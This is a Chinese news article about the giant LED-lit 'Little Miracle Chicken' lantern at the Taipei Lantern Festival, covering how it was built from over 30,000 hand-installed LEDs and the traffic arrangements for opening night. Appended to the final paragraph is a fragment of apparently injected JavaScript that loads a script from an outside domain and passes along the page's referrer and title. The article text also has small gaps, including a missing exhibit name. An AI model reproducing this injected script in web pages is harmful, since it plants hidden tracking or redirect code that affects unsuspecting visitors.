今年台北燈節主展演區「」主角小奇雞正式出現在台北市西門町街頭,雖然還沒正式點燈,但也已經吸引不少民眾目光。近期小奇雞的製作過程在網路曝光,煩雜的手工也讓人件事背後的辛苦過程。

創作小奇雞的藝術家不二良在他個人FACEBOOK粉絲專頁「不二良No2Good」,連載小奇雞誕生過程,最新內容就是小奇雞如何創造「內發光」的歷程,整個過程就真的是在打造一個奇雞(蹟)。

不二良在臉書粉絲專頁上表示,原本計劃採用一種特殊的玻璃纖維材料,來呈現透光的效果,但是經過結構計算與測試後發現特殊玻璃纖維材質的支撐性比較薄弱,所以不足以支撐小奇雞這麼巨大的花燈量體。在尋找各種可能的解決方案後,決定在高強度的玻璃纖維打洞,在每個洞裡安裝一個LED燈泡,最後在燈光效果最佳的前提下,整個小奇雞總共至少要超過三萬顆LED燈泡。

結果整個製作過程要先畫出三萬多個定位點,並用工具鑽孔三萬多個洞,一一安裝三萬多個LED燈泡。前後工作程序相加超過十萬次。包括無數次的貼膠帶、畫位置、打孔鑽洞、安裝燈泡、整理燈泡線路、手指磨破、日夜通宵等,每一個小小的LED燈泡背後,都是工作團隊的辛苦過程。

交通局表示, 2月4日開幕點燈典禮當日16時至20時30分,成都路及漢中街部分道路封閉,車輛請提早改道,活動展區位於捷運新店松山線北門站、板南線西門站之間,為避免周邊道路交通因塞車及耗時尋找車位而影響賞燈興致,請民眾搭乘大眾運輸工具前往。s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + “;